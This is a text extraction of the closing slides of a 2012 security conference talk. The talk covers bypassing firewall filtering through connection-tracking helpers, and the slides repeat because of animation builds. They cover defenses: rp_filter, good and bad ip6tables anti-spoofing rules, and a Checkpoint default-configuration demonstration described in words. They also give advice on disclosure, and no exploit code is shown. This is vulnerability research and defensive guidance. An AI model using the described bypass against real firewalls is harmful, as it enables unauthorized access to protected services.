Protection for Netfilter


We only have to use the rp_filter feature.
It is available since last century in all Linux kernel.
Disabled by default. Enabled by all decent firewall scripts.

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

31 / 44

Protection for Netfilter


We only have to use the rp_filter feature.
It is available since last century in all Linux kernel.
Disabled by default. Enabled by all decent firewall scripts.
To activate it:
echo " 1 " > / proc / sys / n e t / i p v 4 / c o n f / a l l / r p _ f i l t e r

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

31 / 44

Protection for Netfilter


We only have to use the rp_filter feature.
It is available since last century in all Linux kernel.
Disabled by default. Enabled by all decent firewall scripts.
To activate it:
echo " 1 " > / proc / sys / n e t / i p v 4 / c o n f / a l l / r p _ f i l t e r

Wait

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

31 / 44

Protection for Netfilter


We only have to use the rp_filter feature.
It is available since last century in all Linux kernel.
Disabled by default. Enabled by all decent firewall scripts.
To activate it:
echo " 1 " > / proc / sys / n e t / i p v 4 / c o n f / a l l / r p _ f i l t e r

Wait and for IPv6?

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

31 / 44

Protection for Netfilter


We only have to use the rp_filter feature.
It is available since last century in all Linux kernel.
Disabled by default. Enabled by all decent firewall scripts.
To activate it:
echo " 1 " > / proc / sys / n e t / i p v 4 / c o n f / a l l / r p _ f i l t e r

Wait and for IPv6?


No problem, lets set value in /proc:
echo " 1 " > / proc / sys / n e t / i p v 6 / c o n f / a l l / r p _ f i l t e r
/ proc / sys / n e t / i p v 6 / c o n f / a l l / r p _ f i l t e r : No such f i l e o r d i r e c t o r y

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

31 / 44

Protection for Netfilter


We only have to use the rp_filter feature.
It is available since last century in all Linux kernel.
Disabled by default. Enabled by all decent firewall scripts.
To activate it:
echo " 1 " > / proc / sys / n e t / i p v 4 / c o n f / a l l / r p _ f i l t e r

Wait and for IPv6?


No problem, lets set value in /proc:
echo " 1 " > / proc / sys / n e t / i p v 6 / c o n f / a l l / r p _ f i l t e r
/ proc / sys / n e t / i p v 6 / c o n f / a l l / r p _ f i l t e r : No such f i l e o r d i r e c t o r y

Okay, Houston, weve had a problem here.


(Jack Swigert)

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

31 / 44

IPv6 protection for Netfilter

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

32 / 44

IPv6 protection for Netfilter

A manual setup is needed.

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

32 / 44

IPv6 protection for Netfilter

A manual setup is needed.


Dedicated ip6tables rules
need to be written.

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

32 / 44

IPv6 protection for Netfilter

A manual setup is needed.


Dedicated ip6tables rules
need to be written.
The network topology
needs to be known.

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

32 / 44

IPv6 protection for Netfilter

A manual setup is needed.


Dedicated ip6tables rules
need to be written.
The network topology
needs to be known.
Good implementations
already implement these
rules.

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

32 / 44

IPv6 protection for Netfilter

A manual setup is needed.


Dedicated ip6tables rules
need to be written.
The network topology
needs to be known.
Good implementations
already implement these
rules.
But do they resist to the
attack?

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

32 / 44

IPv6 protection for Netfilter


The bad ruleset
i p 6 t a b l e s A FORWARD m s t a t e s t a t e ESTABLISHED , RELATED j ACCEPT
i p 6 t a b l e s A FORWARD i $CLIENT_IFACE ! s $CLIENT_NET j DROP

The attack packet is valid for Netfilter.


It belongs to an established connection.
It is accepted by the first rule and never reaches the anti-spoofing
rule.

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

33 / 44

IPv6 protection for Netfilter


The bad ruleset
i p 6 t a b l e s A FORWARD m s t a t e s t a t e ESTABLISHED , RELATED j ACCEPT
i p 6 t a b l e s A FORWARD i $CLIENT_IFACE ! s $CLIENT_NET j DROP

The attack packet is valid for Netfilter.


It belongs to an established connection.
It is accepted by the first rule and never reaches the anti-spoofing
rule.

The good ruleset


i p 6 t a b l e s A PREROUTING t raw i $CLIENT_IFACE ! s $CLIENT_NET j DROP

Raw table is before the FORWARD chain and even before


connection tracking related operations.
The packet is dropped before causing any problem.
ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

33 / 44

Checkpoint setup

Checkpoint absolute newbie


I did not read the documentation.
Why should I? Im working on firewalls for many years.

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

34 / 44

Checkpoint setup

Checkpoint absolute newbie


I did not read the documentation.
Why should I? Im working on firewalls for many years.
Thats the newbie reflex.

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

34 / 44

Checkpoint setup

Checkpoint absolute newbie


I did not read the documentation.
Why should I? Im working on firewalls for many years.
Thats the newbie reflex.

Used software
Demonstration version.
Minimal features installed.

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

34 / 44

Checkpoint setup

Checkpoint absolute newbie


I did not read the documentation.
Why should I? Im working on firewalls for many years.
Thats the newbie reflex.

Used software
Demonstration version.
Minimal features installed.
Per default installation.

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

34 / 44

Demonstration setup

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

35 / 44

Demonstration setup
Lets do a filtering policy with a single FTP allowed rule ;

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

35 / 44

Demonstration setup
Lets do a filtering policy with a single FTP allowed rule ;

And install the resulting policy.

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

35 / 44

Demonstration

Video

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

36 / 44

Demonstration

Video
Lets have a firewall with a filtering policy allowing only port 21 and
open a connection to port 22 on a FTP server.

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

36 / 44

Policy violation

One managed to open a connection to port 22


With a filtering policy not allowing this

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

37 / 44

Policy violation

One managed to open a connection to port 22


With a filtering policy not allowing this
But the connection was blocked after a few packets.

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

37 / 44

Policy violation

One managed to open a connection to port 22


With a filtering policy not allowing this
But the connection was blocked after a few packets.
Checkpoint GUI displays a warning about anti-spoofing.

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

37 / 44

There is no problem

Swift reaction of Checkpoint security team


Configuring anti-spoofing is a basic requirement.
Them
Are you planning some action regarding this issue?
Me
Anti-spoofing exists exactly for such issues. So [we] dont
think that we need to do anything.
Them

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

38 / 44

There is no problem

Swift reaction of Checkpoint security team


Configuring anti-spoofing is a basic requirement.
Them
Are you planning some action regarding this issue?
Me
Anti-spoofing exists exactly for such issues. So [we] dont
think that we need to do anything.
Them

Basic requirement
Choose well you contractor: the security level depends on his skills.

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

38 / 44

Introduction
Netfilter and the Conntrack
Degree of freedom in Netfilter helpers
Attacking connection tracking helpers

Attack description
Conditions and principles
FTP case
Others protocols

Impact and existing protection


Netfilter
Checkpoint

Conclusion

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

39 / 44

Other products

A generic attack
The attack may impact other firewall brands using ALGs.
Many of these firewalls remain untested:
Netfilter based firewall,
Iptables frontend,
Firewalls using ALG.

Testing
Easy to do with opensvp script.
Contact me if you are interested in using it.

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

40 / 44

Low level attacks are not dead


IPv6 Linux teaches the hard way
For the sake of performance, rp_filter for IPv6 was not developed.
Two patch proposals were refused.
Hopefully, a Netfilter Reverse Path filtering module will be
available in Linux 3.3.

Checkpoint default configuration


Usability intails insecure default values.
Anti-spoofing on Checkpoint Cluster seems problematic to
manage.
See: http://rivald.blogspot.com/2011/01/
checkpoint-utm-firewall-clusters-part-2.html

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

41 / 44

Firewall survival guide


Getting up is dangerous
Getting up in the OSI layer is dangerous.
Old protocols such as FTP are dangerous.
New ones such as SIP continue in the same vein.

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

42 / 44

Firewall survival guide


Getting up is dangerous
Getting up in the OSI layer is dangerous.
Old protocols such as FTP are dangerous.
New ones such as SIP continue in the same vein.

About the security level


Secure by default is a myth:
Default configuration can be vulnerable to attacks.
Dont leave any warning unpunished.

Defense In Depth should not remain a myth:


Protect internal services even if they are behind a firewall.
Physically separated router and firewall was a good idea.
Using both rp_filter and iptables-based anti-spoofing was also a
good one.
ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

42 / 44

Handling a generic attack


A really difficult task
It is impossible for one individual
to get the list of potentially vulnerable products.
to contact all the relevant people.

It is even worse when custom iptables script are vulnerable.

Possible help
Contact CERT
If you get no response, send them a second e-mail.
Try to contact CERT Luxembourg, CERT Finland.
Microsoft Vulnerability Research (MSVR) is an alternative to CERT.

Contact OSS security mailing list if open source software is


involved.

ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

43 / 44

Questions
Do you have any questions?

Thanks to
Pablo Neira, Patrick McHardy: kernel developers can be friendly.
Sebastien Tricaud, Alexandre Dulaunoy: for their help and
because APT can be fun.

More information
My blog : http://home.regit.org
Secure use of Iptables and connection tracking helpers:
http://home.regit.org/netfilter-en/secure-use-of-helpers/

Contact me
E-mail: [email protected]
Twitter: @Regiteric
ric Leblond (OISF)

Playing with network layers to bypass firewalls filtering policy


Cansecwest 2012

44 / 44

You might also like